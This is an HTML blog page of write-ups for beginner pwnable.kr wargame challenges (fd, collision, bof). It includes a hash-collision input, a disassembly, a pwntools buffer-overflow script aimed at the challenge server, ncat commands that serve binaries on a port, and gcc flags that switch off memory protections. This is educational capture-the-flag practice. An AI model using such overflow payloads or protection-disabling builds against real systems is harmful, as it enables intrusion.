2024-05-05 23:31:00 +08:00
<!DOCTYPE HTML>
< html lang = "en" class = "sidebar-visible no-js coal" >
< head >
<!-- Book generated using mdBook -->
< meta charset = "UTF-8" >
< title > Solutions for pwnable.kr - Andrew' s Blog< / title >
<!-- Custom HTML head -->
< meta name = "description" content = "Andrew Ryan's Blog" >
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< meta name = "theme-color" content = "#ffffff" / >
< link rel = "icon" href = "../../favicon.svg" >
< link rel = "shortcut icon" href = "../../favicon.png" >
< link rel = "stylesheet" href = "../../css/variables.css" >
< link rel = "stylesheet" href = "../../css/general.css" >
< link rel = "stylesheet" href = "../../css/chrome.css" >
<!-- Fonts -->
< link rel = "stylesheet" href = "../../FontAwesome/css/font-awesome.css" >
< link rel = "stylesheet" href = "../../fonts/fonts.css" >
<!-- Highlight.js Stylesheets -->
< link rel = "stylesheet" href = "../../highlight.css" >
< link rel = "stylesheet" href = "../../tomorrow-night.css" >
< link rel = "stylesheet" href = "../../ayu-highlight.css" >
<!-- Custom theme stylesheets -->
< link rel = "stylesheet" href = "../../src/style/custom.css" >
<!-- MathJax -->
< script async src = "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" > < / script >
< / head >
< body >
< div id = "body-container" >
<!-- Provide site root to javascript -->
< script >
var path_to_root = "../../";
var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "coal" : "coal";
< / script >
<!-- Work around some values being stored in localStorage wrapped in quotes -->
< script >
try {
var theme = localStorage.getItem('mdbook-theme');
var sidebar = localStorage.getItem('mdbook-sidebar');
if (theme.startsWith('"') & & theme.endsWith('"')) {
localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
}
if (sidebar.startsWith('"') & & sidebar.endsWith('"')) {
localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
}
} catch (e) { }
< / script >
<!-- Set the theme before any content is loaded, prevents flash -->
< script >
var theme;
try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
if (theme === null || theme === undefined) { theme = default_theme; }
var html = document.querySelector('html');
html.classList.remove('no-js')
html.classList.remove('coal')
html.classList.add(theme);
html.classList.add('js');
< / script >
<!-- Hide / unhide sidebar before it is displayed -->
< script >
var html = document.querySelector('html');
var sidebar = null;
if (document.body.clientWidth >= 1080) {
try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
sidebar = sidebar || 'visible';
} else {
sidebar = 'hidden';
}
html.classList.remove('sidebar-visible');
html.classList.add("sidebar-" + sidebar);
< / script >
< nav id = "sidebar" class = "sidebar" aria-label = "Table of contents" >
< div class = "sidebar-scrollbox" >
2024-05-09 21:02:15 +08:00
< ol class = "chapter" > < li class = "chapter-item affix " > < a href = "../../index.html" > Andrew's Blog< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/linux.html" > < strong aria-hidden = "true" > 1.< / strong > Linux< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/linux/install_linux.html" > < strong aria-hidden = "true" > 1.1.< / strong > install linux< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/bash_profile.html" > < strong aria-hidden = "true" > 1.2.< / strong > bash profile< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/command_list.html" > < strong aria-hidden = "true" > 1.3.< / strong > command list< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/git_guide.html" > < strong aria-hidden = "true" > 1.4.< / strong > git guide< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/tar.html" > < strong aria-hidden = "true" > 1.5.< / strong > tar< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/git_cheatsheet.html" > < strong aria-hidden = "true" > 1.6.< / strong > Git Cheatsheet< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/bash_cheatsheet.html" > < strong aria-hidden = "true" > 1.7.< / strong > Bash Cheatsheet< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/macos/mac.html" > < strong aria-hidden = "true" > 2.< / strong > MacOS< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/macos/macos_profiles.html" > < strong aria-hidden = "true" > 2.1.< / strong > macos profiles< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/macos/macos_pwn_env_setup.html" > < strong aria-hidden = "true" > 2.2.< / strong > macos pwn env setup< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/windows/windows.html" > < strong aria-hidden = "true" > 3.< / strong > Windows< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/windows/windows.html" > < strong aria-hidden = "true" > 3.1.< / strong > Windows< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/windows/windows10_use_powershell_dedup_redundent_path.html" > < strong aria-hidden = "true" > 3.2.< / strong > Windows10 use PowerShell dedup redundent PATH< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/cs/cs.html" > < strong aria-hidden = "true" > 4.< / strong > C#< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/cs/learn_cs_basics.html" > < strong aria-hidden = "true" > 4.1.< / strong > Learn C# Basics< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift.html" > < strong aria-hidden = "true" > 5.< / strong > Swift< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/swift/learn_swift.html" > < strong aria-hidden = "true" > 5.1.< / strong > learn swift basics< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift_extensions.html" > < strong aria-hidden = "true" > 5.2.< / strong > Swift extensions< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swiftui_extension.html" > < strong aria-hidden = "true" > 5.3.< / strong > SwiftUI extensions< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/install_swift.html" > < strong aria-hidden = "true" > 5.4.< / strong > install swift< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/task_planner.html" > < strong aria-hidden = "true" > 5.5.< / strong > implment task panner app with SwiftUI< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift_cheat_sheet.html" > < strong aria-hidden = "true" > 5.6.< / strong > Swift Cheat Sheet< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/yinci_url.html" > < strong aria-hidden = "true" > 5.7.< / strong > Personal privacy protocol< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift_regular_exressions.html" > < strong aria-hidden = "true" > 5.8.< / strong > Swift regular exressions< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/ios/how_to_create_beautiful_ios_charts_in_swift.html" > < strong aria-hidden = "true" > 5.9.< / strong > How to Create Beautiful iOS Charts in < / a > < / li > < li class = "cha
2024-05-05 23:31:00 +08:00
< / div >
< div id = "sidebar-resize-handle" class = "sidebar-resize-handle" > < / div >
< / nav >
<!-- Track and set sidebar scroll position -->
< script >
var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
sidebarScrollbox.addEventListener('click', function(e) {
if (e.target.tagName === 'A') {
sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop);
}
}, { passive: true });
var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
sessionStorage.removeItem('sidebar-scroll');
if (sidebarScrollTop) {
// preserve sidebar scroll position when navigating via links within sidebar
sidebarScrollbox.scrollTop = sidebarScrollTop;
} else {
// scroll sidebar to current active section when navigating via "next/previous chapter" buttons
var activeSection = document.querySelector('#sidebar .active');
if (activeSection) {
activeSection.scrollIntoView({ block: 'center' });
}
}
< / script >
< div id = "page-wrapper" class = "page-wrapper" >
< div class = "page" >
< div id = "menu-bar-hover-placeholder" > < / div >
< div id = "menu-bar" class = "menu-bar sticky" >
< div class = "left-buttons" >
< button id = "sidebar-toggle" class = "icon-button" type = "button" title = "Toggle Table of Contents" aria-label = "Toggle Table of Contents" aria-controls = "sidebar" >
< i class = "fa fa-bars" > < / i >
< / button >
< button id = "theme-toggle" class = "icon-button" type = "button" title = "Change theme" aria-label = "Change theme" aria-haspopup = "true" aria-expanded = "false" aria-controls = "theme-list" >
< i class = "fa fa-paint-brush" > < / i >
< / button >
< ul id = "theme-list" class = "theme-popup" aria-label = "Themes" role = "menu" >
< li role = "none" > < button role = "menuitem" class = "theme" id = "light" > Light< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "rust" > Rust< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "coal" > Coal< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "navy" > Navy< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "ayu" > Ayu< / button > < / li >
< / ul >
< button id = "search-toggle" class = "icon-button" type = "button" title = "Search. (Shortkey: s)" aria-label = "Toggle Searchbar" aria-expanded = "false" aria-keyshortcuts = "S" aria-controls = "searchbar" >
< i class = "fa fa-search" > < / i >
< / button >
< / div >
< h1 class = "menu-title" > Andrew' s Blog< / h1 >
< div class = "right-buttons" >
< a href = "https://gitee.com/dnrops/dnrops" title = "Git repository" aria-label = "Git repository" >
< i id = "git-repository-button" class = "fa fa-github" > < / i >
< / a >
< / div >
< / div >
< div id = "search-wrapper" class = "hidden" >
< form id = "searchbar-outer" class = "searchbar-outer" >
< input type = "search" id = "searchbar" name = "searchbar" placeholder = "Search this book ..." aria-controls = "searchresults-outer" aria-describedby = "searchresults-header" >
< / form >
< div id = "searchresults-outer" class = "searchresults-outer hidden" >
< div id = "searchresults-header" class = "searchresults-header" > < / div >
< ul id = "searchresults" >
< / ul >
< / div >
< / div >
<!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
< script >
document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
});
< / script >
< div id = "content" class = "content" >
< main >
< h1 id = "solutions-for-pwnablekr" > < a class = "header" href = "#solutions-for-pwnablekr" > Solutions for pwnable.kr< / a > < / h1 >
< h2 id = "toddlers-bottle" > < a class = "header" href = "#toddlers-bottle" > [Toddler’ < / a > < / h2 >
< h3 id = "fd" > < a class = "header" href = "#fd" > fd< / a > < / h3 >
< pre > < code > ssh fd@pwnable.kr -p2222
(pw:guest)
convert `0x1234` to int 4660
```sh
./fd 4660
LETMEWIN
# can get the flag
< / code > < / pre >
< h3 id = "collision" > < a class = "header" href = "#collision" > collision< / a > < / h3 >
< pre > < code class = "language-sh" > ssh col@pwnable.kr -p2222
(pw:guest)
file ./col
# can find that it's a 32bit binary and is little-endian
< / code > < / pre >
< p > Big-endian:
In big-endian systems, the most significant byte (MSB) is stored at the lowest memory address, followed by the less significant bytes. For example, the 32-bit integer 0x12345678 would be stored as 12 34 56 78 in memory.< / p >
< p > Little-endian:
In little-endian systems, the least significant byte (LSB) is stored at the lowest memory address, followed by the more significant bytes. For the same 32-bit integer 0x12345678, it would be stored as 78 56 34 12 in memory.< / p >
< pre > < code class = "language-sh" > 0x21DD09EC => 568134124
# 最小的4字节是0x01010101
0x01010101 *4 = 0x4040404
0x4040404 => 67372036
568134124 - 67372036 = 500762088
500762088 => 0x1DD905E8
./col " `python -c 'print(" \x01" *16+" \xe8\x05\xD9\x1d" )'`"
# can get the flag
ncat -vc ./a.out -kl 192.168.64.6 4444
< / code > < / pre >
< h3 id = "bof" > < a class = "header" href = "#bof" > bof< / a > < / h3 >
< pre > < code > Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c
Running at : nc pwnable.kr 9000
ncat -vc ./bof -kl 192.168.64.6 4444
< / code > < / pre >
< pre > < code class = "language-sh" > gef➤ checksec
[+] checksec for '/home/ubuntu22/code/pwn/pwnable_kr_challenge/bof/bof'
Canary : ✓
NX : ✓
PIE : ✓
Fortify : ✘
RelRO : Full
gef➤ disassemble func
Dump of assembler code for function func:
0x00005555555551c9 < +0> : endbr64
0x00005555555551cd < +4> : push rbp
0x00005555555551ce < +5> : mov rbp,rsp
0x00005555555551d1 < +8> : sub rsp,0x40
0x00005555555551d5 < +12> : mov DWORD PTR [rbp-0x34],edi
0x00005555555551d8 < +15> : mov rax,QWORD PTR fs:0x28
0x00005555555551e1 < +24> : mov QWORD PTR [rbp-0x8],rax
0x00005555555551e5 < +28> : xor eax,eax
0x00005555555551e7 < +30> : lea rax,[rip+0xe16] # 0x555555556004
0x00005555555551ee < +37> : mov rdi,rax
0x00005555555551f1 < +40> : mov eax,0x0
0x00005555555551f6 < +45> : call 0x5555555550c0 < printf@plt>
0x00005555555551fb < +50> : lea rax,[rbp-0x2c]
0x00005555555551ff < +54> : mov rdi,rax
0x0000555555555202 < +57> : mov eax,0x0
0x0000555555555207 < +62> : call 0x5555555550d0 < gets@plt>
0x000055555555520c < +67> : cmp DWORD PTR [rbp-0x34],0xcafebabe
0x0000555555555213 < +74> : jne 0x555555555226 < func+93>
0x0000555555555215 < +76> : lea rax,[rip+0xdf7] # 0x555555556013
0x000055555555521c < +83> : mov rdi,rax
0x000055555555521f < +86> : call 0x5555555550b0 < system@plt>
0x0000555555555224 < +91> : jmp 0x555555555235 < func+108>
0x0000555555555226 < +93> : lea rax,[rip+0xdee] # 0x55555555601b
0x000055555555522d < +100> : mov rdi,rax
0x0000555555555230 < +103> : call 0x555555555090 < puts@plt>
0x0000555555555235 < +108> : nop
0x0000555555555236 < +109> : mov rax,QWORD PTR [rbp-0x8]
0x000055555555523a < +113> : sub rax,QWORD PTR fs:0x28
0x0000555555555243 < +122> : je 0x55555555524a < func+129>
0x0000555555555245 < +124> : call 0x5555555550a0 < __stack_chk_fail@plt>
0x000055555555524a < +129> : leave
0x000055555555524b < +130> : ret
End of assembler dump.
< / code > < / pre >
< pre > < code class = "language-python" > from pwn import *
p = remote('pwnable.kr', 9000)
buf = 'a' * 0x2c
buf += 'b' * 4
buf += 'c' * 4
buf += str(p32(0xcafebabe))
p.sendline(buf)
p.interactive()
< / code > < / pre >
< h3 id = "gcc-compile-flags" > < a class = "header" href = "#gcc-compile-flags" > gcc compile flags< / a > < / h3 >
< div class = "table-wrapper" > < table > < thead > < tr > < th > item< / th > < th > opt< / th > < th > descript< / th > < / tr > < / thead > < tbody >
< tr > < td > NX(DEP)< / td > < td > -z execstack // 禁用NX保护 -z noexecstack // 开启NX保护< / td > < td > 堆栈禁止执行< / td > < / tr >
< tr > < td > RELRO< / td > < td > -z norelro // 关闭 -z lazy // 部分开启 -z now // 全部开启< / td > < td > GOT写保护< / td > < / tr >
< tr > < td > PIE(ASLR)< / td > < td > -no-pie //关闭pie -fpie -pie // 开启PIE, , < / td > < td > 代码段、数据段地址随机化< / td > < / tr >
< tr > < td > CANARY< / td > < td > -fno-stack-protector // 禁用 -fstack-protector // 开启 -fstack-protector-all // 完全开启< / td > < td > 堆栈溢出哨兵< / td > < / tr >
< tr > < td > FORTIFY< / td > < td > -D_FORTIFY_SOURCE=1 // 较弱的检查 -D_FORTIFY_SOURCE=2 // 较强的检查< / td > < td > 常用函数加强检查< / td > < / tr >
< / tbody > < / table >
< / div >
< hr / >
< pre > < code > # CANARY : disabled => -fno-stack-protector
# FORTIFY : disabled
# NX : disabled => -z execstack
# PIE : disabled => -no-pie
gcc -m32 -no-pie -fno-stack-protector -o rop rop.c -z execstack
< / code > < / pre >
< h3 id = "ida-remote-debug" > < a class = "header" href = "#ida-remote-debug" > ida remote debug< / a > < / h3 >
< pre > < code class = "language-sh" > mkdir ~/pwn
cd ~/pwn
wget https://gitcode.net/dnrops/ida_dbgsrv/-/raw/main/linux_server
wget https://gitcode.net/dnrops/ida_dbgsrv/-/raw/main/linux_server64
chmod 777 ./*
# addpend ~/.bashrc
export PATH=" ~/pwn/:$PATH"
source ~/.bashrc
# get ip address
ifconfig
192.168.64.6
linux_server64 -i 192.168.64.6 -p 23230
# connect on ida
< / code > < / pre >
< / main >
< nav class = "nav-wrapper" aria-label = "Page navigation" >
<!-- Mobile navigation buttons -->
< a rel = "prev" href = "../../posts/ctf/sqlilabs_writeup.html" class = "mobile-nav-chapters previous" title = "Previous chapter" aria-label = "Previous chapter" aria-keyshortcuts = "Left" >
< i class = "fa fa-angle-left" > < / i >
< / a >
< a rel = "next" href = "../../posts/ctf/the_periodic_table.html" class = "mobile-nav-chapters next" title = "Next chapter" aria-label = "Next chapter" aria-keyshortcuts = "Right" >
< i class = "fa fa-angle-right" > < / i >
< / a >
< div style = "clear: both" > < / div >
< / nav >
< / div >
< / div >
< nav class = "nav-wide-wrapper" aria-label = "Page navigation" >
< a rel = "prev" href = "../../posts/ctf/sqlilabs_writeup.html" class = "nav-chapters previous" title = "Previous chapter" aria-label = "Previous chapter" aria-keyshortcuts = "Left" >
< i class = "fa fa-angle-left" > < / i >
< / a >
< a rel = "next" href = "../../posts/ctf/the_periodic_table.html" class = "nav-chapters next" title = "Next chapter" aria-label = "Next chapter" aria-keyshortcuts = "Right" >
< i class = "fa fa-angle-right" > < / i >
< / a >
< / nav >
< / div >
< script >
window.playground_line_numbers = true;
< / script >
< script >
window.playground_copyable = true;
< / script >
< script src = "../../ace.js" > < / script >
< script src = "../../editor.js" > < / script >
< script src = "../../mode-rust.js" > < / script >
< script src = "../../theme-dawn.js" > < / script >
< script src = "../../theme-tomorrow_night.js" > < / script >
< script src = "../../elasticlunr.min.js" > < / script >
< script src = "../../mark.min.js" > < / script >
< script src = "../../searcher.js" > < / script >
< script src = "../../clipboard.min.js" > < / script >
< script src = "../../highlight.js" > < / script >
< script src = "../../book.js" > < / script >
<!-- Custom JS scripts -->
< script src = "../../src/js/custom.js" > < / script >
< / div >
< / body >
< / html >
